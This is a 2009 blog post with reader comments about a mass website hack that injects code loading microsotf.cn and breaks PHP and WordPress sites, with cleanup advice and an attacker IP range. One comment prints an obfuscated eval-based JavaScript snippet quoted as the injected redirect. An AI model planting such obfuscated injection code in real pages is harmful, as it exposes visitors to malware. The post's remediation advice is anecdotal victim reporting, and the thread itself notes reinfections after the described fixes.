Matt Swanner - Web Guru

Website hack – microsotf.cn – WordPress

So I emerged from a fantastic vacation weekend to find all of my PHP sites not working, each displaying the same simple error message:

Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING, expecting ',' or ';'

After my initial 30-second panic attack subsided, I did a little googling and came up with this site: http://www.geeked.info/web-site-hack-loading-microsotfcn/

I’m assuming this is a bot that crawls from site to site. I had websites hacked across three different servers.

Once hacked, the site serves a tiny iframe that loads microsotf.cn. Don't visit that page; it will most certainly ruin your day with spyware, malware, whatever. The twist is that WordPress sites don't display the iframe at all. The injected block lands inside PHP source rather than plain HTML, the parser chokes on it (that is the parse error above), and the site just winds up broken. Other sites won't appear any different, and from the rendered page it is nearly impossible to tell whether the site was hacked or not.

If you're having this problem, open the source of the page in question and look for an injected block of code, either immediately following the body tag or at the very bottom of the source. (The original post shows a screenshot of the block here: an iframe, or a script that writes one, pointing at microsotf.cn.)

Delete the offending code and upload the cleaned file (back up the original first, just in case) and you're back in business. That gets the site rendering again, but by itself it does not close whatever let the code in: the edit below and several of the comments describe the same sites being hit again, so change the FTP password as well and check every page on the account, not just the one that threw the error.

Thanks to Ed over at http://www.geeked.info/ for having the ONLY blog post I could find on the whole internet about the hack.

EDIT: 7/9/09: It has happened again to one of my sites. Different block of code, different malware site being loaded, same basic poison/remedy. For those interested in learning how to block an IP address (or a range of IP addresses), click here.

8 Responses to “Website hack – microsotf.cn – WordPress”

  1. Mark says:

    Happened to me too. Thanks for posting this.

  2. Dave says:

    Happened to us also, 3 times!!!
    We don’t know how they keep doing it either!!!

  3. pissedoff says:

    I did that. It was OK for a week, now I've been attacked by it again ... changed my FTP passwords and everything. How do you prevent this thing from attacking?

  4. Matt says:

    Contact your server administrator (in my case, my shared hosting companies) and let them know what's going on. If they're even remotely worth doing business with, they will investigate and block the offending IP address (91.212.198.37) or, better yet, the entire range: 91.212.*.*

    My host is awesome: Glitterhost. Their servers are some of the fastest in the US, the owner of the company returns phone calls personally, and they blocked that IP address for me within hours of my contacting them.

  5. pissedoff says:

    Cool, contacted my host and advised them. Thanks heaps for the IP range, it was a great help ... let's hope my host is as helpful.

    Cheers

  6. http://rockymountainenvironmental.com/ says:
    07/04/09 — 8:16am
    Altered files: index.htm, index.html, default.asp, main.html
    Offending Code: document.write("');document.write("');document.write("");
    The Script failed to redirect due to conflict between my script call and my arguments. Repaired files 07/06/09 after discovery.

    07/09/09 — 6:11AM
    NEW OFFENDING CODE
    eval("d((*)&!o$^!%c$[[^@&um((*)&!e$[[^@&n[@&%^t.w$[[^@&r((*)&!i((*)&!t$^!%e(&@)&]('(&@)&]'$^!%)$[[^@&;[@&%^".replace(/\(\&\@\)\&\]|\$\^\!\%|\(\(\*\)\&\!|\$\[\[\^\@\&|\[\@\&\%\^/ig, ""))
    This redirect bypassed my script calls and proceeded to download malware.
    Malware: [braviax (FakeAlert Trojan)] & [ID12 undetermined self-replicating virus]
    I have closed down any server-side includes that are not necessary, changed passwords, and contacted Web.com to block the IP, as I, as a client, don't have access or admin rights to .htaccess. Best of luck to all.
    (Allen)

  7. Rob says:

    Happened to me too – 5 sites taken out. For the second time. If you don’t mind, what host are you using? I’m using 1and1.com. I’m wondering if there’s a commonality amongst us.

    It's been suggested on other sites in my research that they may be using your own FTP software by stealing your saved usernames and passwords. Not sure if that's how they're getting into our servers so easily, but it couldn't hurt to save them in a separate encrypted file. Some also say that it doesn't matter if you save them with the FTP client or not, since they'll grab them once you try to connect to your server, and that the only safe way to transfer files is SSH.

  8. Matt says:

    I read about the ftp passwords. I don’t find that too hard to believe, but last night my Bludomain site was hacked again and I had THEM change my password the last time it happened, so I don’t think FTP passwords are the only way in.
